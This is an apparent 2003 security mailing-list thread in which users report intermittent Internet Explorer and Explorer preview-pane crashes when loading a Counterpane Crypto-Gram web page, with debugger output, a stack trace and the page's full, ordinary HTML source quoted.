	However, after some fiddling, I have found this problem also affects
	explorer.exe.  Copy the file to a folder in windows, and turn
	on your image preview pane (web content pane, whatever that rubbish is
	on the left side) while viewing that directory.  Then click on the file,
	and when the preview pane tries to render the image, sometimes it
	crashes.
	
	Since a separate thread of execution does the parsing, race conditions
	are probably what is making the crashes inconsistent.
	
	Anyone else have more to offer?
	
	tim
	
	
	On Tue, Sep 02, 2003 at 05:38:43PM +0200, nonleft@....net wrote:
	> crashes on my side as well
	>
	> win XP no packets in place.
	> so I run my debugger: (sorry german)
	>
	> Der Thread 'Win32 Thread' (0x818) hat mit Code 0 (0x0) geendet.
	> Unbehandelte Ausnahme bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	> Eine Ausnahme (erste Chance) bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	> Unbehandelte Ausnahme bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	>
	> well it tries to do a read function in the memory, where it has no business
	> to do :-)
	> and this causes the system failure and the program has to be restarted
	> 
	> 7FFE02FC  add         byte ptr [eax],al
	> 7FFE02FE  add         byte ptr [eax],al
	> 7FFE0300  mov         edx,esp
	> 7FFE0302  sysenter        
	> 7FFE0304  ret             
	> 7FFE0305  pushfd          
	> 7FFE0306  or          dword ptr [esp],100h
	> 7FFE030D  popfd           
	> 7FFE030E  ret              <---- here comes the downfall :-)
	> 7FFE030F  mov         edx,esp
	> 7FFE0311  syscall         
	> 7FFE0313  ret             
	> 7FFE0314  nop             
	> 7FFE0315  pushfd          
	> 7FFE0316  or          dword ptr [esp],100h
	>
	> so it comes from:
	>
	>         7ffe0304()     
	>         ntdll.dll!77f6f4af()   
	>         ntdll.dll!77f6e265()   
	>         mshtml.dll!74877f58()  
	> >       mshtml.dll!74877576()  
	>  that was it on my machine.....
	>
	> reproduced it twice.
	> but i could not see what this behavior evoked in the html code?!?!
	> first i thought could have something to do with the embedded scripts, but
	> doesn't seem so....  
	>
	> btw not using Outlook (and i could not see why this should have something to
	> do with it)
	>
	>
	> mfg/kind regards
	>
	> nonleft
	> At 13:53 02.09.2003 +0200, you wrote:
	>
	> Hi,
	>
	> > No, I am very sure that this happens also, if you follow the link inside
	> > a web page only (without an involving mail client).
	>
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> > click the link that says "Holger Hasselbach has translated several
	> > issues of Crypto-Gram into German [...]". The error occurs as described
	> > in my original posting.
	>
	>
	> well i tried
	>
	> windows 2003 server no updates
	>
	> first time i clicked it page closed after 5 seconds
	>
	> second time nothing happened
	>
	> third time it closed after 5 seconds
	>
	> well 4th time nothing happened
	>
	> 5th time closed again
	>
	> each time i spawned a new ie-window with the link and then followed
	> the one in the bottom
	>
	> mfg
	>
	> Michel Zobel
	> Software Entwicklung
	> hnw health network GmbH i.G.
	>
	> HTTP/1.1 200 OK
	> Date: Tue, 02 Sep 2003 15:21:25 GMT
	> Server: Apache
	> Last-Modified: Thu, 28 Aug 2003 19:52:06 GMT
	> ETag: "2dc9a-9cb7-3f4e5d66"
	> Accept-Ranges: bytes
	> Content-Length: 40119
	> Connection: close
	> Content-Type: text/html
	>
	> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
	>
	> <html>
	>
	> <head>
	>
	>  <title>Counterpane: Crypto-Gram</title>
	> 
	>  <link rel="STYLESHEET" type="text/css" href="cp.css">
	> 
	>  <script></script>
	>  <script src="scripts/cp-5.js"></script>
	>
	>  <script>
	> 
	>  var nameMenus = new Array('menuCompany', 'menuServices', 'menuCustomers', 'menuNews', 'menuLibrary', 'menuSite', 'menuContact');
	>  var menuImgNames = new Array();
	>  menuImgNames['menuCompany'] = 'nav_4_company';
	>  menuImgNames['menuServices'] = 'nav_4_services';
	>  menuImgNames['menuCustomers'] = 'nav_5_customers';
	>  menuImgNames['menuNews'] = 'nav_new_news';
	>  menuImgNames['menuLibrary'] = 'nav_new_library';
	>  menuImgNames['menuSite'] = 'nav_new_site';
	>  menuImgNames['menuContact'] = 'nav_5_contact';
	> 
	>  function init(){
	>   
	>    loaded = true;
	>    if (ns4) {
	>   window.captureEvents(Event.RESIZE);
	>   window.onresize = netscapeResize;
	>   document.alinkColor="#666666";
	>   document.vlinkColor="#666666";
	>    }
	>    else if (!ie4 && DOM) {
	>   document.getElementById("menuCompany").style.display = "";
	>     document.getElementById("menuServices").style.display = "";
	>   document.getElementById("menuCustomers").style.display = "";
	>     document.getElementById("menuNews").style.display = "";
	>   document.getElementById("menuLibrary").style.display = "";
	>   document.getElementById("menuSite").style.display = "";
	>   document.getElementById("menuContact").style.display = "";
	>    }
	>   
	>    returnLayer("menuCompany");
	>    returnLayer("menuServices");
	>    returnLayer("menuCustomers");
	>    returnLayer("menuNews");
	>    returnLayer("menuLibrary");
	>    returnLayer("menuSite");
	>    returnLayer("menuContact");
	>  }
	>  </script>
	> </head>
	>
	> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="init()" alink="#666666" vlink="#666666" bgcolor="#FFFFFF" text="#000000">  
	>
	>
	> <!-- top navigation ------------------------------------------>
	> <table width="100%" cellspacing="0" cellpadding="0" border="0">
	>
	>   <tr>
	>  
	>     <!-- logo ------------------------------------------------>
	>    <td width="146"  bgcolor="#FFFFFF"><a href="index.html"><img src="images/cplogo.gif" alt="COUNTERPANE LOGO" border="0" width="132" height="87" hspace="5" vspace="15"></a><br>
	>   <img src="images/clear.gif" alt="" border="0" width="146" height="10" vspace=0 hspace=0></td>
	> 
	>  <td width="100%" valign="top" align="left" height=70>
	> 
	>    <!-- menu bar -->
	>       <table width="100%" cellspacing="0" cellpadding="0" border="0">
	>           <tr bgcolor="#001851">
	>           <script language="JavaScript" type="text/javascript">
	>     <!--
	>       document.writeln('<td width="76"><a href="#" onMouseover="menuOn(\'menuCompany\')" onMouseout="overChecker(\'menuCompany\')"><img name="nav_4_company" src="images/nav_4_company.gif" width="76" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuServices\')" onMouseout="overChecker(\'menuServices\')"><img name="nav_4_services" src="images/nav_4_services.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuCustomers\')" onMouseout="overChecker(\'menuCustomers\')"><img name="nav_5_customers" src="images/nav_5_customers.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuNews\')" onMouseout="overChecker(\'menuNews\')"><img name="nav_new_news" src="images/nav_new_news.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuLibrary\')" onMouseout="overChecker(\'menuLibrary\')"><img name="nav_new_library" src="images/nav_new_library.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuSite\')" onMouseout="overChecker(\'menuSite\')"><img name="nav_new_site" src="images/nav_new_site.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuContact\')" onMouseout="overChecker(\'menuContact\')"><img name="nav_5_contact" src="images/nav_5_contact.gif" width="78" height="26" border="0"></a></td>');
	>
	>     //-->
	>     </script>
	>     <noscript>
	> <td width="76"><a href="#"><img alt="" src="images/clear.gif" width="76" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="70"><a href="sitemap.html"><img alt="SITE MAP" src="images/nav_new_sitemap.gif" width="70" height="26" border="0"></a></td>   
	>     </noscript>
	>    <td width="70"><img src="images/clear.gif" alt="" width="70" height="5" border="0"></td>
	>             <td width="14"><img src="images/clear.gif" alt="" width="14" height="1"></td>
	>             <td width="2"><img src="images/clear.gif" alt="" width="2" height="1"></td>
	>           <td background="images/angle.gif" width="100%" bgcolor="#FFFFFF"><img src="images/clear.gif" alt="" width="1" height="1"></td>
	>           </tr>
	>    
	>           <tr height="4" bgcolor="#CCCCCC">
	>             <td colspan="8"><img src="images/clear.gif" alt="" width="92" height="4"></td>
	>             <td width="25"><img src="images/clear.gif" alt="" width="25" height="4"></td>
	>             <td><img src="images/clear.gif" alt="" width="1" height="4"></td>
	>           <td width="100%" bgcolor="#FFFFFF" background="images/angle_bottom.gif"><img src="images/clear.gif" alt="" width="1" height="4"></td>
	>           </tr>
	>
	>       </table>
	>  </td>
	>   </tr>
	>
	> </table>
	>
	> <!-- end top navigation -->
	>
	>
	>
	> <!---- global table ------------------------->
	> <table cellpadding="0" cellspacing="0" border="0" width="558">
	>
	>   <tr>
	>
	>     <!-------------- left column ---------------------------------------------------->
	>
	>     <td valign="top" width="146" bgcolor="#CCCCCC">
	> 
	>    <!---- highlights ------------------------->
	>    <img src="images/topleft_whatsnew.gif" alt="What's New" border="0" width="146" height="18"><br>
	>   
	>    <table cellpadding="0" cellspacing="0" border="0" width="146">
	>     <tr>
	>     <td><img src="images/clear.gif" alt="" border="0" width="6" height="1"></td>
	>     <td><table cellpadding="0" cellspacing="0" border="0" width="134">
	>      <tr>
	>        <td><img src="images/clear.gif" alt="" border="0" width="1" height="10"></td></tr>
	>
	> <!--ignore_perlfect_search-->
	> <!-- begin highlights -->
	>
	>
	> <tr><td class="leftcol"><a href="pr-20030825.html">Counterpane Delivers Industry's Most Comprehensive Managed Security Services</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="alerts.html">Security Alerts: Nachi Worm, New SoBig Variant</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030813.html">Paul Stich Assumes Role of President and CEO</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030715.html">Counterpane Announces Record Second Quarter Results</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030625.html">Bruce Schneier Testifies at Hearing of Homeland Security Subcommittee</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-sclifetime.html">Secure Computing Magazine Honors Bruce Schneier with Lifetime Achievement Award</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-hs.html">Counterpane Strengthens Executive Team with the Additions of Doug Howard and Kevin Senator</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	> <!-- end highlights -->
	> <!--/ignore_perlfect_search-->
	>
	>      <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>    
	>     </table>
	>    </td>
	>   </tr>
	>  </table>
	> 
	>
	>
	> <!---- search form ------------------------->
	>  <table cellpadding="0" cellspacing="0" border="0" width="146">
	>   <tr><td colspan=2><img src="images/dottedline.gif" alt="" border="0" width="146" height="1"></td></tr>
	>   <tr><td colspan=2><img src="images/search_header.gif" alt="Search" border="0" width=38 height=16 hspace="5"></td></tr>
	>   <tr><td colspan=2><img src="images/dottedline.gif" alt="" border="0" width="146" height="1"></td></tr>
	>   <tr><td colspan=2><img src="images/clear.gif" alt="" border="0" width="1" height="10"></td></tr>
	>  <tr valign=middle><form name="searchForm" action="/search/search.pl"><td align=left class="black-text" valign=top>
	>      <!-- conditional sizing of search field, based on browser -->
	>               <script language="JavaScript" type="text/javascript">
	>      <!--
	>      if(ns4 && !mac) {document.writeln('<input type="text" class="black-text" size="8" name="q">');}
	>      else if (ns4 && mac) {document.writeln('<input type="text" size="11" class="black-text" name="q" onFocus="scrollTo(0,0)">');} 
	>      else if (ie4 && mac) {document.writeln('<input type="text" size="15" name="q">');}
	>      else {document.writeln('<input type="text" size="16" class="black-text" name="q">');}
	>      //-->
	>      </script>
	>      <noscript><input type="text" size="8" class="black-text" name="q"></noscript>
	>
	> 
	>  </td><td><input WIDTH=24 HEIGHT=15 type="image" name="q" src="images/search_button2.gif" alt="GO" hspace=2 border="0"></td></form></tr></table>
	>
	>
	>
	> <!------- end of left column------------------->
	> </td>
	>
	> <!---spacer----><td width="8"><img src="images/clear.gif" alt="" border="0" width="8" height="1"><br></td>
	>
	>  <!-------------- middle column ------------------------------------------------------->
	>  <td valign="top" width="404">
	>    <table cellpadding="0" cellspacing="0" border="0" width="404">
	>    <tr>
	>      <td><img src="images/header_crypto.gif" alt="Crypto-Gram Newsletter" border="0" width=199 height=14></td>
	>    </tr>
	>    <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>    </table>
	>      <table cellpadding="0" cellspacing="0" border="0" width="404">
	>           <tr>
	>       <td valign="bottom" align="left"> <!---- title ------------------------->
	>               <table cellpadding="0" cellspacing="0" border="0" width="403">
	>                 <tr>
	>                   <td width="393" align="left" valign="top">
	>                     <p><img src="images/clear.gif" alt="" border="0" width="1" height="10"></p>
	>
	>               <table width="393" border="0" cellspacing="0" cellpadding="4">
	>
	>
	> <TR><TD colspan=2>
	> <P class="black-text">Crypto-Gram is a <STRONG>free</STRONG> monthly e-mail newsletter on computer security and cryptography from
	> <a href="schneier.html">Bruce Schneier</a>
	> (author of <a href="sandl.html">Secrets and Lies</a> and <a href="applied.html">Applied Cryptography</a>, inventor of <a href="blowfish.html">Blowfish</a>
	> and <a href="twofish.html">Twofish</a>,
	> CTO and founder of <a href="/">Counterpane Internet Security, Inc.</a>,
	> general <a href="pitfalls.html">crypto pundit</a>
	> and occasional
	> <a href="whycrypto.html">crypto curmudgeon</a>).
	>
	> <P class="black-text"><STRONG class="black-bold-text">Subscriptions</STRONG>
	> <BR>To subscribe to the list, send e-mail to <a href="mailto:crypto-gram-subscribe@...parraltree.com">our subscription address</a> from the address you wish to subscribe.  You will receive a confirmation message; reply to that message to finalize your subscription.
	>
	> <P class="black-text"><a href="http://www.counterpane.com/unsubform.html">More details on subscribing and unsubscribing</a>
	>
	> <P class="black-text">Our <a href="#privacy">privacy statement</a> is below.
	>
	> <P class="black-text"><STRONG class="black-bold-text">Issues</STRONG>
	> </TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0308.html">15 Aug 2003</a></TH>
	> <TD class="black-text">Beyond Fear, flying on someone else's plane ticket, hidden text in computer documents</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0307.html">15 Jul 2003</a></TH>
	> <TD class="black-text">How to fight, more e-mail filtering idiocy, Password Safe, crying wolf</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0306.html">15 Jun 2003</a></TH>
	> <TD class="black-text">Cyber-terrorism, self-destructing DVDs, attacking virtual machines, auditable tasers</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0305.html">15 May 2003</a></TH>
	> <TD class="black-text">Encryption and wiretapping, receipts, unique e-mail addresses and spam</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0304.html">15 Apr 2003</a></TH>
	> <TD class="black-text">Postal denial-of-service, baseball, NCIC database accuracy</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0303.html">15 Mar 2003</a></TH>
	> <TD class="black-text">Practical Cryptography, SSL flaw, SSL patent case, woodland ants</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0302.html">15 Feb 2003</a></TH>
	> <TD class="black-text">Locks and full disclosure, SQL Slammer, importance of authentication</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0301.html">15 Jan 2003</a></TH>
	> <TD class="black-text">Militaries and cyber-war, cichlid fish, RMAC authentication mode</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0212.html">15 Dec 2002</a></TH>
	> <TD class="black-text">Counterattack, Department of Homeland Security, Dan Cooper, crime</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0211.html">15 Nov 2002</a></TH>
	> <TD class="black-text">New book, Japanese honeybees, choose your own Doghouse candidate</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0210.html">15 Oct 2002</a></TH>
	> <TD class="black-text">National Strategy to Secure Cyberspace, more on AES cryptanalysis, one-time pads</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0209.html">15 Sep 2002</a></TH>
	> <TD class="black-text">Word 97 vulnerability, AES news, Reveal, The Odyssey</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0208.html">15 Aug 2002</a></TH>
	> <TD class="black-text">Palladium and the TCPA, license to hack, arming airline pilots</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0207.html">15 Jul 2002</a></TH>
	> <TD class="black-text">Embedded control systems and security, Perrun virus</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0206.html">15 Jun 2002</a></TH>
	> <TD class="black-text">Fixing intelligence failures, more on secrecy and security</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0205.html">15 May 2002</a></TH>
	> <TD class="black-text">Secrecy, security, and obscurity; fun with fingerprint readers</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0204.html">15 Apr 2002</a></TH>
	> <TD class="black-text">How to think about security, liability and security, key length</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0203.html">15 Mar 2002</a></TH>
	> <TD class="black-text">SNMP, IETF &quot;Responsible Disclosure&quot; document, Bernstein's factoring paper</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0202.html">15 Feb 2002</a></TH>
	> <TD class="black-text">Judging Microsoft, Oracle's &quot;unbreakable&quot; database</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0201.html">15 Jan 2002</a></TH>
	> <TD class="black-text">Windows UPnP vulnerability, Password Safe 2.0, AGS Encryptions</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0112.html">15 Dec 2001</a></TH>
	> <TD class="black-text">National ID cards, judges punish bad security, fun with vulnerability scanners</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0111.html">15 Nov 2001</a></TH>
	> <TD class="black-text">Full disclosure, GOVNET, Password Safe vulnerability, Windows XP</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0110.html">15 Oct 2001</a></TH>
	> <TD class="black-text">Cyberterrorism and cyberhooliganism, war on terrorism, SSSCA, Nimda, port 80</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0109a.html">30&nbsp;Sep&nbsp;2001</a></TH>
	> <TD class="black-text">Special issue on the Sep. 11 terrorist attacks and their aftermath
	> <BR><a href="http://zeusnews.com/index.php3?ar=stampa&cod=838&ar2=stampa&numero=999">Italian translation by Paolo Attivissimo</a></TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0109.html">15&nbsp;Sep&nbsp;2001</a></TH>
	> <TD class="black-text">11 September 2001, NSA's dual counter mode, Microsoft root certificate program</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0108.html">15&nbsp;Aug&nbsp;2001</a></TH>
	> <TD class="black-text">DMCA, Code Red, copyright protection, cybercrime treaty</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0107.html">15&nbsp;Jul&nbsp;2001</a></TH>
	> <TD class="black-text">Phone hacking: the next generation, monitoring first</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0106.html">15&nbsp;Jun&nbsp;2001</a></TH>
	> <TD class="black-text">Honeypots and Honeynet, Invicta Networks, DDOS attacks on grc.com</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0105.html">15&nbsp;May&nbsp;2001</a></TH>
	> <TD class="black-text">Military history, digital copy prevention, security standards, safe personal computing</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0104.html">15&nbsp;Apr&nbsp;2001</a></TH>
	> <TD class="black-text">Advantages of defense, CSI computer crime survey, fake Microsoft certificates</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0103.html">15&nbsp;Mar&nbsp;2001</a></TH>
	> <TD class="black-text">The security patch treadmill, insurance, death of IDS, 802.11 security</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0102.html">15&nbsp;Feb&nbsp;2001</a></TH>
	> <TD class="black-text">CPRM, an intentional backdoor, e-mail filter idiocy, air gaps, internet voting</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0101.html">15&nbsp;Jan&nbsp;2001</a></TH>
	> <TD class="black-text">A cyber UL?, SafeMessage, social engineering, code signing in Windows</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0012.html">15&nbsp;Dec&nbsp;2000</a></TH>
	> <TD class="black-text">Voting and technology, digital safe-deposit boxes, new bank privacy regs</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0011.html">15&nbsp;Nov&nbsp;2000</a></TH>
	> <TD class="black-text">Digital signatures, SDMI hacking challenge, Microsoft hack</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0010.html">15&nbsp;Oct&nbsp;2000</a></TH>
	> <TD class="black-text">Semantic attacks, cybercrime treaty, NSA on security, AES announced</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0009.html">15&nbsp;Sep&nbsp;2000</a></TH>
	> <TD class="black-text">Full disclosure, Carnivore, FBI and the Olympics, Facemail, PGP vulnerability</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0008.html">15&nbsp;Aug&nbsp;2000</a></TH>
	> <TD class="black-text">Secrets and Lies, &quot;Crime in Cyberspace&quot; convention, Authentica, Bluetooth</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0007.html">15&nbsp;Jul&nbsp;2000</a></TH>
	> <TD class="black-text">Full disclosure and the CIA, presidential password, lockmaking, Unicode</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0006.html">15&nbsp;Jun&nbsp;2000</a></TH>
	> <TD class="black-text">SOAP, Java and viruses, DES, Infraworks</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0005.html">15&nbsp;May&nbsp;2000</a></TH>
	> <TD class="black-text">Microsoft vs. Slashdot, Cybercrime treaty, Trusted client software, ILOVEYOU</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0004.html">15&nbsp;Apr&nbsp;2000</a></TH>
	> <TD class="black-text">AES conference, French banking card hack, Microsoft Active Setup, UCITA</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0003.html">15&nbsp;Mar&nbsp;2000</a></TH>
	> <TD class="black-text">Kerberos and Win2K, software burglary tools, UCITA, software complexity</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0002.html">15&nbsp;Feb&nbsp;2000</a></TH>
	> <TD class="black-text">Distributed denial-of-service, Chinese crypto regs, publicizing vulnerabilities</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0001.html">15&nbsp;Jan&nbsp;2000</a></TH>
	> <TD class="black-text">Publicity attacks, new encryption regs, Netscape, block and stream ciphers</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9912.html">15&nbsp;Dec&nbsp;1999</a></TH>
	> <TD class="black-text">Security as process, ECHELON, export regulations draft, GSM encryption</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9911.html">15&nbsp;Nov&nbsp;1999</a></TH>
	> <TD class="black-text">Why computers are insecure, DVD encryption, Win CE, Elliptic Curves</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9910.html">15&nbsp;Oct&nbsp;1999</a></TH>
	> <TD class="black-text">Becoming a cryptographer, export rules, AMD, PKI slogans, key length</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9909.html">15&nbsp;Sep&nbsp;1999</a></TH>
	> <TD class="black-text">Open source, NSAKEY, CESA, E*Trade, factoring RSA</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9908.html">15&nbsp;Aug&nbsp;1999</a></TH>
	> <TD class="black-text">Back Orifice 2000, AES news, HPUX, web-based encrypted mail</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9907.html">15&nbsp;Jul&nbsp;1999</a></TH>
	> <TD class="black-text">Future of crypto-hacking, bungled SSL, reader comments</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9906.html">15&nbsp;Jun&nbsp;1999</a></TH>
	> <TD class="black-text">E-mail viruses, hacking archives, international encryption policy</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9905.html">15&nbsp;May&nbsp;1999</a></TH>
	> <TD class="black-text">Internationalization of cryptography, export rules, TWINKLE</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9904.html">15&nbsp;Apr&nbsp;1999</a></TH>
	> <TD class="black-text">The importance of not being different, smart card threats, attacking certificates with viruses</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9903.html">15&nbsp;Mar&nbsp;1999</a></TH>
	> <TD class="black-text">Security hole in IE/Outlook and Office, AES news, RSA-140 factored</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9902.html">15&nbsp;Feb&nbsp;1999</a></TH>
	> <TD class="black-text">Snake oil, NSA and crypto export, WinXFiles, back doors, Intel's processor ID</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9901.html">15&nbsp;Jan&nbsp;1999</a></TH>
	> <TD class="black-text">1998 year-in-review, clueless agents, Cayley-Purser</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9812.html">15&nbsp;Dec&nbsp;1998</a></TH>
	> <TD class="black-text">Cracking contests, recognizing plaintext, zip disks, Commerce Dept. committee</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9811.html">15&nbsp;Nov&nbsp;1998</a></TH>
	> <TD class="black-text">Electronic commerce, micro locks, copy protection, more on steganography</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9810.html">15&nbsp;Oct&nbsp;1998</a></TH>
	> <TD class="black-text">Steganography, TriStrata, Rapid Remote, memo to amateur cipher designers</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9809.html">15&nbsp;Sep&nbsp;1998</a></TH>
	> <TD class="black-text">Cramer-Shoup, impossible cryptanalysis, street performer, Private Doorbell</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9808.html">15&nbsp;Aug&nbsp;1998</a></TH>
	> <TD><P class="black-text">Hardware DES cracker, KEA, chosen protocol attack, biometrics</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9807.html">15&nbsp;Jul&nbsp;1998</a></TH>
